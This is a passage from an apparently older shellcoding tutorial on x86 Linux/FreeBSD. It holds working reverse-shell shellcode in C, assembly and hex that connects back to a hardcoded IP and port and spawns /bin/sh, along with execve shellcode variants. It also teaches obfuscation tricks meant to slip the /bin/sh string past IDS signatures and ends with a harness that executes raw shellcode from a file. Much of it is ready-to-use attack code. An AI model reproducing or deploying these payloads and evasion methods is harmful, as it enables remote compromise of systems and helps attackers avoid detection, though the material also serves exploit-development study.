[esi + 15], eax mov byte al, 0x0b mov ebx, esi lea ecx, [esi + 11] lea edx, [esi + 15] int 0x80 callit: call doit db '/bin/bash'
In this example we will see how to create shellcode that creates a shell, which connects back to a host you control. You'll be able to catch the shell by using a tool such as netcat. In this shellcode you will have to hardcode an IP address to connect to. It is also possible to add this ip address at the runtime of the exploit (which is a good idea). Please remember to convert the IP address ! for testing puposes the assembly and shellcode below will connect to 10.6.12.33 (an machine in my tiny test lab) on port 43690. Within the code this IP address is converted to: 0x210c060a . You can obtain this hex value pretty easily with perl: su-2.05a# perl -e 'printf "0x" . "%02x"x4 ."\n",33,12,6,10' 0x210c060a
Just make sure you reverse the IP address like I did with 10.6.12.33. The C code on which the assembly is based:
#include<unistd.h> #include<sys/socket.h> #include<netinet/in.h> int soc,rc; struct sockaddr_in serv_addr; int main() { serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0x210c060a; serv_addr.sin_port=0xAAAA; /* port 43690 */ soc=socket(2,1,6); rc = connect(soc, (struct sockaddr *)&serv_addr,0x10); dup2(soc,0); dup2(soc,1); dup2(soc,2); execve("/bin/sh",0,0); }
And the assembly implementation:
BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 7], al ; Next code: socket(2,1,6) push byte 0x06 ; The 3e argument push byte 0x01 ; The 2e argument push byte 0x02 ; The 1e argument mov al,97 ; The system call number push eax ; int 0x80 ; And call the kernel ; ; Next code: connect(soc,(struct sockaddr *)&serv_addr,0x10); mov edx,eax ; We store the file descriptor that was returned from socket() in edx xor eax,eax ; Now we will create the sockaddr_in structure mov byte [esi + 9],0x02 ; This equals: serv_addr.sin_family=2 mov word [esi + 10],0xAAAA ; This equals: serv_addr.sin_port=0xAAAA /* port 43690 */ mov long [esi + 12],0x210c060a ; This equals: serv_addr.sin_addr.s_addr=0x210c060a push byte 0x10 ; We now start with pushing the arguments, 0x10 is the 3e one. lea eax,[esi + 8] ; Get the address of our structure, arg 2 of bind() is a pointer. push eax ; And push it on the stack, our second argument is a fact push edx ; And we push the last argument, the file descriptor, on the stack xor eax,eax ; Clean up mov al,98 ; System call 98 represents connect. push eax ; int 0x80 ; And call the kernel ; ; Next code: dup2(cli,0) , dup2(cli,1) and dup2(cli,2) ; We will do this in a loop since this creates smaller code. mov cl,3 ; Define our counter = 3 mov ebx,-1 ; The C code for our loop is: b = -1; for(int i =3;i>0;i--) { dup(cli,++b) }; ; l00p: ; The loop code starts here. inc ebx ; This is the instead of the ++b code push ebx ; We push this value first because it represents the last argument push edx ; We push the second argument, the file descriptor from accept() mov al,90 ; We define the system call push eax ; int 0x80 ; And call the kernel to execute sub cl, 1 ; Substract 1 from cl jnz l00p ; This will continue the loop if cl != 0 ; ; Next the execve of /bin/sh xor eax,eax ; First we create some zero's push eax ; The 3e argument == NULL push eax ; So is the second push esi ; The first argument is a pointer to our string /bin/sh mov al,59 ; We define the system call, execve. push eax ; int 0x80 ; And execute
callit: call doit db '/bin/sh'
Shellcode generated from this assembly code will look like this. I have made the IP address bold so you'll known where to search for it if you need to change it.
char shellcode[] = "\xeb\x52\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0" "\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46" "\x0a\xaa\xaa\xc7\x46\x0c\x0a\x06\x0c\x21\x6a\x10\x8d\x46\x08" "\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\xb1\x03\xbb\xff\xff\xff" "\xff\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31" "\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\xa9\xff\xff\xff\x2f" "\x62\x69\x6e\x2f\x73\x68";
In some cases the buffer that causes the overflow is manipulated by the vulnerable program. This happens more often then you might think and makes exploiting overflows more difficult and often more fun !. For example many programs filter dots and slashes. Oh my GOD !! isn't there something we can do about this ? yes there is ;-) We can use the almighty 'inc' operator to increase the hex value of our ascii character. Below is a simple example that illustrates how to do this but first a part from Intel's description of 'inc'. Adds 1 to the destination operand, while preserving the state of the CF flag. The destination operand can be a register or a memory location. Now an example in how to do this. Let's say we have the string: db 'ABCD' We can change B in to a C by using: inc byte [esi + 2] So what this does is the hex value of B is changed from 42 to 43 which represents C. A working example of the assembly code required to do this: BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 7], al mov byte [esi + 10], al mov long [esi + 11], esi lea ebx, [esi + 8] mov long [esi + 15], ebx mov long [esi + 19], eax inc byte [esi] ; Now we have /bin.sh inc byte [esi + 4] ; Now we have /bin/sh mov byte al, 0x0b mov ebx, esi lea ecx, [esi + 11] lea edx, [esi + 19] int 0x80 callit: call doit db '.bin.sh#-i#AAAABBBBCCCC' This can also be done to obfuscate parts of shellcode that might trigger IDS signatures. Incstructions such as ADD, SUB INC and DEC can be useful for this. By using a loop you can recover strings at run time and by doing so you might be able get undetected by an IDS or atleast, lower the risk of detection. Have a look at the following example: BITS 32 jmp short callit doit: pop esi xor eax, eax mov byte [esi + 7], al lea ebx, [esi] mov long [esi + 8], ebx mov long [esi + 12], eax mov cl,7 ; The loop begins here, we will loop 7 times change: dec byte [esi + ecx - 1 ] ; Change the byte on the right location sub cl, 1 ; Update the counter 'cl' jnz change ; Verify if we should break the loop mov byte al, 0x0b mov ebx, esi lea ecx, [esi + 8] lea edx, [esi + 12] int 0x80 callit: call doit db '0cjo0ti#AAAABBBB' The extra -1 in the line "dec byte [esi + ecx - 1 ]" is to make sure we als change the byte [esi + 0]. The above assembly code will generate shell code that changes the string '0cjo0ti' to '/bin/sh' and which will then do an execve of it. The end result (after removing the #AAAABBB chars) will be: char shellcode[] = "\xeb\x25\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" "\x0c\xb1\x07\xfe\x4c\x0e\xff\x80\xe9\x01\x75\xf7\xb0\x0b\x89" "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd6\xff\xff\xff\x30" "\x63\x6a\x6f\x30\x74\x69";
A nice FreeBSD example to hide the /bin/sh string in simple execve shellcode:
BITS 32 mov byte [esi + 5],0x73 mov byte [esi + 1],0x62 mov byte [esi],0x2f xor eax, eax mov byte [esi + 7], al mov byte [esi + 2],0x69 push eax mov byte [esi + 6],0x68 push eax mov byte [esi + 4],0x2f push esi mov byte [esi + 3],0x6e mov al,59 push eax int 0x80
So the string /bin/sh is build character for character and not in the correct order. This will make it very hard for IDS's to detect the existance of the string! By creating an exploit that would shift the bold made code during execution you could make it extra hard to detect.
char shellcode[] = "\xc6\x46\x05\x73\xc6\x46\x01\x62\xc6\x06\x2f\x31\xc0\x88\x46" "\x07\xc6\x46\x02\x69\x50\xc6\x46\x06\x68\x50\xc6\x46\x04\x2f" "\x56\xc6\x46\x03\x6e\xb0\x3b\x50\xcd\x80";
A more advanced method to obfuscate your code is by encoding the shellcode and decoding it at run time. While this seems very hard to do, trust me it is not. If you want to encode shellcode the best way to do this is with some help from a simple c program. More information on doing that will be released in another document on safemode.org
Ofcourse these are just simples example of obfuscating code. It work nice but isn't really efficient. If you are really interested in this stuff, have a look at K2's work at: http://www.ktwo.ca/security.html.
When you assembly code doesn't work, don't give up because tools such as ptrace and ktrace can help you allot ! They can show you the exact arguments that are given to a system call, whether the system call was successful and if any value was returned.
For example, if the FreeBSD connect shellcode fails, you can see why! Just work like this:
ktrace ./s-proc -e <compiled connect assembly code> kdump | more
snip snip snip
1830 process RET write 17/0x11 1830 process CALL socket(0x2,0x1,0x6) 1830 process RET socket 3 1830 process CALL connect(0x3,0x804b061,0x10) 1830 process RET connect -1 errno 61 Connection refused
Aha ! Connection refused.
If you are developing on linux then strace is defenitly your best friend ;-)
char shellcode[] =
"\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad"
"\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
I just put it in a perl script like this:
#!/usr/bin/perl -w
$shellcode =
"\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad".
"\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
open(FILE, ">shellcode.bin");
print FILE "$shellcode";
close(FILE);
I saved the file as ww.pl and disassembled it:
[10:50pm lappie] ./ww.pl
[10:50pm lappie] ndisasm -b 32 shellcode.bin
00000000 5E
pop esi
00000001 31C0
xor eax,eax
00000003 B024
mov al,0x24
00000005 CD80
int 0x80
00000007 B024
mov al,0x24
00000009 CD80
int 0x80
0000000B B058
mov al,0x58
0000000D BBADDEE1FE mov ebx,0xfee1dead
00000012 B969191228
mov ecx,0x28121969
00000017 BA67452301
mov edx,0x1234567
0000001C CD80
int 0x80
Et voila, here is the assembly. Now it is really easy to determine what
kind of shellcode
this is and what technique is being used.
/* * Generic program for testing shellcode byte arrays. * Created by zillion and EVL * * Safemode.org !! Safemode.org !! */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <errno.h> /* * Print message */ static void croak(const char *msg) { fprintf(stderr, "%s\n", msg); fflush(stderr); } /* * Educate user. */ static void usage(const char *prgnam) { fprintf(stderr, "\nExecute code : %s -e <file-containing-shellcode>\n", prgnam); fprintf(stderr, "Convert code : %s -p <file-containing-shellcode> \n\n", prgnam); fflush(stderr); exit(1); } /* * Signal error and bail out. */ static void barf(const char *msg) { perror(msg); exit(1); } /* * Main code starts here */ int main(int argc, char **argv) { FILE *fp; void *code; int arg; int i; int l; int m = 15; /* max # of bytes to print on one line */ struct stat sbuf; long flen; /* Note: assume files are < 2**32 bytes long ;-) */ void (*fptr)(void); if(argc < 3) usage(argv[0]); if(stat(argv[2], &sbuf)) barf("failed to stat file"); flen = (long) sbuf.st_size; if(!(code = malloc(flen))) barf("failed to grab required memeory"); if(!(fp = fopen(argv[2], "rb"))) barf("failed to open file"); if(fread(code, 1, flen, fp) != flen) barf("failed to slurp file"); if(fclose(fp)) barf("failed to close file"); while ((arg = getopt (argc, argv, "e:p:")) != -1){ switch (arg){ case 'e': croak("Calling code ..."); fptr = (void (*)(void)) code; (*fptr)(); break; case 'p': printf("\n\nchar shellcode[] =\n"); l = m; for(i = 0; i < flen; ++i) { if(l >= m) { if(i) printf("\"\n"); printf( "\t\""); l = 0; } ++l; printf("\\x%02x", ((unsigned char *)code)[i]); } printf("\";\n\n\n"); break; default : usage(argv[0]); } } return 0; }